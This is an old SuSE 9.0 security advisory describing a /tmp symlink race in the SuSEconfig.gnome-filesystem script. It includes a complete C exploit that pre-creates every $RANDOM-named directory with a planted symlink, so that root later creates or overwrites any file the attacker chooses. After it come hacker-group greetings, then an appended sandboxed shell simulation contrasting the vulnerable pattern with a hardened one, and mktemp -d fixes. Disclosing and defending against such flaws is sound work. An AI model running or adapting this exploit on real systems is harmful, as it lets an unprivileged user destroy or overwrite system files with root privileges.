/*******************************************************************
Product: SuSE 9.0
Date:    12.01.2004
Risk:    medium to high
Author:  l0om

There is a symlink problem in the SuSEconfig.gnome-filesystem script: a normal user can create or overwrite any file on the system. When YaST executes this script after a configuration change, it does the following:

    TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
    mkdir $TEMP
    touch $TEMP/list
    [...]
    echo >$TEMP/found
    [...]

The $RANDOM shell variable expands to a random number. In my test the values ranged from 1 up to about 33000 (bash's $RANDOM is in fact a 15-bit value, 0 to 32767). Even if it went up to 65535 the script would still be vulnerable to a symlink attack, because the name space is small enough for an attacker to fill completely. The script never checks whether mkdir succeeded, so if the directory already exists (and belongs to the attacker) it is used as if it were fresh, and "echo >$TEMP/found" then follows whatever symlink the attacker has placed under that name, with the privileges of the script (root).

This is nearly as bad as the symlink problem found on SuSE 8.2, where a SuSEconfig script created a temporary file with $$ (the shell's PID) at the end of the name.

I used a little exploit written in C which creates the directories "/tmp/tmp.SuSEconfig.gnome-filesystem.0" up to ".32767", covering the whole $RANDOM range. In every directory I created a symlink named "found" (the $TEMP/found the script writes to) pointing at the file I wanted to create or overwrite. In my test I used /etc/nologin, and hey, it worked!

A workaround is to edit the SuSEconfig.gnome-filesystem script and change

    TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM

to something like

    TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM.$RANDOM.$RANDOM.$RANDOM

since $RANDOM produces a fresh value on every expansion, which makes the name space far too large to pre-create. Note that this only makes the name harder to guess; the underlying defect is that the script uses the directory even when mkdir fails. The proper fix is to create the directory with "mktemp -d", or at least to abort when mkdir returns an error (mkdir is atomic and fails if anything already exists under that name), and to create it with mode 0700.
*******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define PATH  "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 0        /* bash's $RANDOM ranges over 0..32767, so cover all of it */
#define END   32768

int main(int argc, char **argv)
{
    int  i;
    char buf[150];     /* PATH (39 chars) + up to 5 digits + "/found" fits easily */

    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem 0day exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om\n");
    printf("\t WWW.EXCLUDED.ORG\n\n");

    if (argc != 2) {
        printf("usage: %s <file to create or overwrite>\n", argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ", argv[1]);
    fflush(stdout);
    (void)read(0, buf, 1);    /* wait for a keypress on stdin */
    umask(0000);              /* let the 0777 mode below take effect unchanged */
    printf("working\n\n");

    /* one candidate directory per possible $RANDOM value, each holding a
     * "found" symlink; whichever one the script picks, "echo >$TEMP/found"
     * will follow the link and create/truncate the target as root */
    for (i = START; i < END; i++) {
        snprintf(buf, sizeof(buf), "%s%d", PATH, i);
        if (mkdir(buf, 0777) == -1) {
            fprintf(stderr, "cannot create directory %s [Nr.%d]\n", buf, i);
            exit(0xff);
        }
        if (!(i % 1000)) {
            printf(".");
            fflush(stdout);
        }
        strcat(buf, "/found");
        if (symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot create symlink from %s to %s [Nr.%d]\n", buf, argv[1], i);
            exit(0xff);
        }
    }

    printf("\ndone!\n");
    printf("next time the SuSEconfig.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n", argv[1]);
    return 0x00;
}

/* i cant wait for the new gobbles comic! */

greetings:
Maximilian -- for the test machine/s
dna -- "Great, l0om had a shell. Now I get to reformat again..."
Capt. Boris -- the programmer I trust *G*
adminP -- everyone needs an expert :)
Sgt.weyers -- greets
dajak -- check out his great project www.myshell.de/data/pfw
proxy, Takt, FE2k, sirius, and the rest of www.excluded.org
bands like sick of it all, nofx, propagandhi, less than jake, pennywise...

YaCP - Yast another CyberPunk # Phree the Cyberspace - l0om - http://www.excluded.org
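The race described in the advisory and the workaround discussion above, as an added example that is not part of l0om's advisory, the C exploit, or the SuSE script: a scaled-down, unprivileged simulation that runs the vulnerable mkdir/echo pattern and a hardened version against the same pre-created directories. It assumes a scratch directory from mktemp -d stands in for /tmp, a file inside it stands in for /etc/nologin, and RANGE (64 here) stands in for the 32768 values bash's $RANDOM can take; pick_suffix draws the number from /dev/urandom with od so the script also runs under plain sh, and attacker_prepare plays the part the C exploit plays on the real system. All of these names are the example's own.

```shell
#!/bin/sh
# Added simulation of the SuSEconfig.gnome-filesystem symlink race (not the
# original script or exploit). Everything lives under a scratch directory, so
# it needs no root and never touches the real /tmp. RANGE is an assumption:
# it stands in for the 32768 possible $RANDOM values and keeps the demo fast.
RANGE=64

# Draw a number in [0, RANGE) from /dev/urandom; avoids bash's $RANDOM so
# the script also runs under plain sh.
pick_suffix() {
    n=$(od -A n -N 2 -t u2 /dev/urandom | tr -d ' ')
    echo $((n % RANGE))
}

# Attacker (what the C exploit does): pre-create every candidate directory
# with a symlink named "found" inside it, pointing at the file to create or
# overwrite, so the script's "random" name collides whatever value it draws.
attacker_prepare() {
    target=$1
    i=0
    while [ "$i" -lt "$RANGE" ]; do
        d="$SANDBOX/tmp/tmp.SuSEconfig.gnome-filesystem.$i"
        mkdir -p "$d" && ln -s "$target" "$d/found"
        i=$((i + 1))
    done
}

# Vulnerable pattern from the advisory: mkdir's failure is ignored, the
# attacker-owned directory is used as if it were fresh, and the redirection
# follows the planted symlink (as root, on the real system).
vulnerable_run() {
    TEMP="$SANDBOX/tmp/tmp.SuSEconfig.gnome-filesystem.$(pick_suffix)"
    mkdir "$TEMP" 2>/dev/null
    touch "$TEMP/list"
    echo >"$TEMP/found"
}

# Hardened pattern: mkdir is atomic and fails if anything already exists under
# that name, so a failure means someone got there first and the script must
# refuse. Mode 700 keeps other users out of the directory once it is ours.
hardened_run() {
    TEMP="$SANDBOX/tmp/tmp.SuSEconfig.gnome-filesystem.$(pick_suffix)"
    if ! mkdir -m 700 "$TEMP" 2>/dev/null; then
        echo "refusing to use pre-existing $TEMP" >&2
        return 1
    fi
    touch "$TEMP/list"
    echo >"$TEMP/found"
}

# Run one variant against a fresh sandbox. Returns 0 if the victim file was
# created through the symlink (attack succeeded), 1 otherwise.
run_demo() {
    SANDBOX=$(mktemp -d)
    mkdir "$SANDBOX/tmp"
    VICTIM="$SANDBOX/etc_nologin"      # stands in for /etc/nologin
    attacker_prepare "$VICTIM"
    "$1" 2>/dev/null || true
    if [ -e "$VICTIM" ]; then hit=0; else hit=1; fi
    rm -rf "$SANDBOX"
    return $hit
}

demo_vulnerable() { run_demo vulnerable_run; }    # 0: attack worked
demo_hardened()   { ! run_demo hardened_run; }    # 0: attack blocked

if demo_vulnerable; then
    echo "original pattern: victim file created through the planted symlink"
fi
if demo_hardened; then
    echo "hardened pattern: pre-existing directory refused, victim untouched"
fi
```

The advisory's $RANDOM.$RANDOM.$RANDOM.$RANDOM workaround only enlarges the name space; hardened_run fixes the root cause (using a directory it did not create), which is why it defeats the attack even with RANGE this small. In a real script, mktemp -d with a template such as /tmp/tmp.SuSEconfig.gnome-filesystem.XXXXXX does the same atomically with an unpredictable name and mode 0700.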